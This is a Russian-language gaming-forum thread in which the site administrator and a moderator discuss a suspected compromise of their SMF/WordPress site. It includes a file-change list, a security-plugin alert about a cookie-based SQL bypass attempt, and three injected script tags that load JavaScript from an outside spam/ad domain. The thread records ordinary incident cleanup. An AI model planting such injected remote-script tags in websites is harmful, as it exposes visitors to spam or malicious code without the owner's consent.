Добро пожаловать на форум по игре Torchlight!

Новости: Магазин - Гамазавр, скидки на игры

Автор Тема: Подозрение на взлом сайта  (Прочитано 6637 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Borgius

  • Администратор
  • *****
  • Автор темы
  • Сообщений: 966
  • Репутация: 61
  • Класс: Не определился
Подозрение на взлом сайта
« : 09 Февраль 2015, 13:13:05 »
Приветствую. Получил такое сообщение от хостера: "Мы обнаружили признаки взлома сайта mytorchlight.ru. Пожалуйста, проверьте скрипты на наличие вредоносного кода.

В кеш Вашей CMS записываются перл-скрипты, которые запускаются и рассылают спам.

Рекомендуем Вам провести обновление CMS и плагинов, проверить сайт на наличие вредоносного кода и сменить все пароли для доступа по FTP и в админ-панель.
Для проверки можно воспользоваться различными онлайн сервисами: Ссылкапроверить сайт на вирусы
Если они ничего не выявят, тогда необходимо обращаться к программистам. Мы, к сожалению, анализом клиентских скриптов не занимаемся
".

Есть кто-то тут, кто может с этим помочь. Разбираюсь в этих темах слабо.

Спасибо

Оффлайн Kva3imoda

  • Главный Модератор
  • *****
  • Сообщений: 5402
  • Репутация: 164
  • Ломай, круши!
  • Класс: Разрушитель
Re: Подозрение на взлом сайта
« Ответ #1 : 09 Февраль 2015, 13:17:55 »
Хе-хе, один раз нас уже ломали, давно правда. :)


«Если вы не убиваете врагов обеими руками, значит, не используете оружие на полную мощность».

Оффлайн Borgius

  • Администратор
  • *****
  • Автор темы
  • Сообщений: 966
  • Репутация: 61
  • Класс: Не определился
Re: Подозрение на взлом сайта
« Ответ #2 : 09 Февраль 2015, 13:25:13 »
А как быть, есть идеи?

Оффлайн Kva3imoda

  • Главный Модератор
  • *****
  • Сообщений: 5402
  • Репутация: 164
  • Ломай, круши!
  • Класс: Разрушитель
Re: Подозрение на взлом сайта
« Ответ #3 : 09 Февраль 2015, 13:28:01 »
Не, я в этом не разбираюсь, увы. Но он-лайн сервисы ничего не обнаружили. А письмо точно от провайдера? :)


«Если вы не убиваете врагов обеими руками, значит, не используете оружие на полную мощность».

Оффлайн Kva3imoda

  • Главный Модератор
  • *****
  • Сообщений: 5402
  • Репутация: 164
  • Ломай, круши!
  • Класс: Разрушитель
Re: Подозрение на взлом сайта
« Ответ #4 : 09 Февраль 2015, 13:30:27 »


«Если вы не убиваете врагов обеими руками, значит, не используете оружие на полную мощность».

Оффлайн Borgius

  • Администратор
  • *****
  • Автор темы
  • Сообщений: 966
  • Репутация: 61
  • Класс: Не определился
Re: Подозрение на взлом сайта
« Ответ #5 : 09 Февраль 2015, 13:38:41 »
От хостера да.

Оффлайн Borgius

  • Администратор
  • *****
  • Автор темы
  • Сообщений: 966
  • Репутация: 61
  • Класс: Не определился
Re: Подозрение на взлом сайта
« Ответ #6 : 09 Февраль 2015, 13:43:20 »
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-board-30.php   742 B   742 B   09.02.2015 @ 13:36   09.02.2015 @ 12:05   aa99f11c6966f45055a8380e3cf2e4d9   53ec35a2e3e7b84ad15b811ed33e714f
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-board-31.php   751 B   751 B   09.02.2015 @ 13:36   09.02.2015 @ 12:45   685a7f20af0228e31edd8d1a92ac54a2   3ad6731d6616c815788f5d1e2f256f1e
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-board_parents-0.php   118 B   118 B   09.02.2015 @ 13:38   09.02.2015 @ 13:30   ff99d3c23a8668e7755d61592fe4bcaf   bffc0eac90c277c92bae7b6499049ea8
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-log_online-update.php   125 B   125 B   09.02.2015 @ 13:38   09.02.2015 @ 13:35   8dc59640d077dcceaf41a78e7b4485f3   a5c2be37ee43496ec5b435d3cfd0b59a
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-modSettings.php   20 kB   20 kB   09.02.2015 @ 13:38   09.02.2015 @ 13:35   91bcf9ff53ea24b3901417baaf476856   bac14ac64e72d9dbe8f22eb6f3cc2103
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-permissions--1-spider.php   138 B   138 B   09.02.2015 @ 13:39   09.02.2015 @ 13:36   547f396b47768a0fe0a569270a85e42c   0059bd72210302fb3b4464fdd916497d
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-permissions--1.php   138 B   138 B   09.02.2015 @ 13:38   09.02.2015 @ 13:36   c07245302cfed7a076815f0faea58a5d   a912b9d6731155566160786ff62d4631
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-response_prefix.php   123 B   123 B   09.02.2015 @ 13:37   09.02.2015 @ 13:26   a4955f0b880f056f0a559801de5e2903   89b75646c5eacba94c747469e30a3a84
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-spider_search.php   6 kB   6 kB   09.02.2015 @ 13:37   09.02.2015 @ 13:32   9b82c9d747a669ee2935d0edc42e0335   d3f6b370d795115f6bb1785c64333236
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-theme_settings-5.php   2 kB   2 kB   09.02.2015 @ 13:37   09.02.2015 @ 13:35   3702645f49392e8b0305e54511f14423   2b516045a3c80a139a5f0f54fe85e85a
/forum/cache/data_6709f771b522c9102f5f7d00b8ac4d80-SMF-updateStats-postgroups.php   186 B   186 B   09.02.2015 @ 13:38   09.02.2015 @ 13:25   a88e80ceab8223c8b9f9fdfa099e99c1   1068965bb596817cd17bbe842fa3ab98
/wp-content/uploads/2013/04/diablo2-150x130.png   28 kB   28 kB   09.02.2015 @ 13:36   09.02.2015 @ 10:35   2022f63d38ea9ab8c6cab35c1a478c23   2022f63d38ea9ab8c6cab35c1a478c23

Оффлайн Borgius

  • Администратор
  • *****
  • Автор темы
  • Сообщений: 966
  • Репутация: 61
  • Класс: Не определился
Re: Подозрение на взлом сайта
« Ответ #7 : 09 Февраль 2015, 13:43:44 »
Это какие были изменения

Оффлайн Borgius

  • Администратор
  • *****
  • Автор темы
  • Сообщений: 966
  • Репутация: 61
  • Класс: Не определился
Re: Подозрение на взлом сайта
« Ответ #8 : 09 Февраль 2015, 13:50:54 »
Плюс нашел вот такие коды в форуме

<script type="text/javascript" src="//w1140.am15.net/bn1.php?k=tYNKICF7Fb2EttCguv.dT4-ecz11EUVBYjXBY.1cIyf6JtYsJ25bjiu6C7qjeo1p7fs-1MRUVmKxepQpX3GC2JrZhuMfxm66cznn&amp;cook=1&amp;dt=13&amp;fl=1&amp;jq=1&amp;un=0&amp;ref=http%3A%2F%2Fmytorchlight.ru%2Fforum%2Findex.php%3Faction%3Dadmin%3Barea%3Dmodsettings%3Bb68ed59%3D4f7bc2ee5751e5260aae46ff7a7874a6&amp;tt=%D0%A4%D0%BE%D1%80%D1%83%D0%BC%20%D0%BF%D0%BE%20%D0%B8%D0%B3%D1%80%D0%B5%20Torchlight"></script>

<script type="text/javascript" id="amdto" src="Ссылка"></script>

<script type="text/javascript" id="amdtrack" src="//am15.net/track/track.php?k=S-gxyBmXNBITNO-thm.T1BbDy9b.yPpz18I.NOajhIRX11QtKd6yJ1Et91vSrr6jJEwq28IDssl.B7IHe3Fn&amp;ref=http%3A%2F%2Fmytorchlight.ru%2Fforum%2Findex.php%3Faction%3Dadmin%3Barea%3Dmodsettings%3Bb68ed59%3D4f7bc2ee5751e5260aae46ff7a7874a6&amp;tt=%D0%A4%D0%BE%D1%80%D1%83%D0%BC%20%D0%BF%D0%BE%20%D0%B8%D0%B3%D1%80%D0%B5%20Torchlight"></script>


Оффлайн Kva3imoda

  • Главный Модератор
  • *****
  • Сообщений: 5402
  • Репутация: 164
  • Ломай, круши!
  • Класс: Разрушитель
Re: Подозрение на взлом сайта
« Ответ #9 : 09 Февраль 2015, 13:58:32 »
Да, коды похоже действительно для рассылки какого-то спама и адрес приводит нас к advmaker.net.
Нужен специалист, либо как советуют, восстановить сайт из бэкапа, если взломали сегодня.


«Если вы не убиваете врагов обеими руками, значит, не используете оружие на полную мощность».

Оффлайн Borgius

  • Администратор
  • *****
  • Автор темы
  • Сообщений: 966
  • Репутация: 61
  • Класс: Не определился
Re: Подозрение на взлом сайта
« Ответ #10 : 09 Февраль 2015, 14:04:54 »
Вот нужен как раз специалист... Попробую на серче поискать

Оффлайн Kva3imoda

  • Главный Модератор
  • *****
  • Сообщений: 5402
  • Репутация: 164
  • Ломай, круши!
  • Класс: Разрушитель
Re: Подозрение на взлом сайта
« Ответ #11 : 09 Февраль 2015, 14:15:51 »
Да, где-то боты нашли уязвимость, будь они неладны. Даже если из бэкапа восстановить, дырка все-таки останется.


«Если вы не убиваете врагов обеими руками, значит, не используете оружие на полную мощность».

Оффлайн Borgius

  • Администратор
  • *****
  • Автор темы
  • Сообщений: 966
  • Репутация: 61
  • Класс: Не определился
Re: Подозрение на взлом сайта
« Ответ #12 : 09 Февраль 2015, 14:30:36 »
Бросил клич на searchengines. Жду

Оффлайн Borgius

  • Администратор
  • *****
  • Автор темы
  • Сообщений: 966
  • Репутация: 61
  • Класс: Не определился
Re: Подозрение на взлом сайта
« Ответ #13 : 09 Февраль 2015, 14:42:41 »
Вроде удалил код. У меня не отображается. Как у вас?

Оффлайн Borgius

  • Администратор
  • *****
  • Автор темы
  • Сообщений: 966
  • Репутация: 61
  • Класс: Не определился
Re: Подозрение на взлом сайта
« Ответ #14 : 09 Февраль 2015, 14:46:34 »
Вот еще что обнаружил:

The WP-Sentinel security system, has detected a potential hacker attack against this blog.

Attack details follow :

- Variable SMFCookie709 of the COOKIE method triggered the filter 'basic SQL authentication bypass attempts 3/3' for the content 'a:4:{i:0;s:1:\"1\";i:1;s:40:\"831a6388e76a6d687187d27f4292c0c3888aa9bf\";i:2;i:1425374258;i:3;i:0;}'.

A complete and detailed report which includes your details, such as your IP address etc, has just been saved and sent to the administrator of this site.
If it was a mistake, properly a "false positive", you do not have nothing to fear as they will be ignored, but if your attack is actually a violation of existing rules on breach of computer systems, hacking and / or theft of copyrighted material, competent authorities will be contacted and provided with all the necessary data to find you.

 

Яндекс.Метрика SPRINTHOST.RU: быстрый и надежный хостинг!
SMF 2.0.5 | SMF © 2011, Simple Machines
| Карта сайта | Форум фан-сайта mytorchlight.ru
При использовании материалов гиперссылка на mytorchlight.ru обязательна.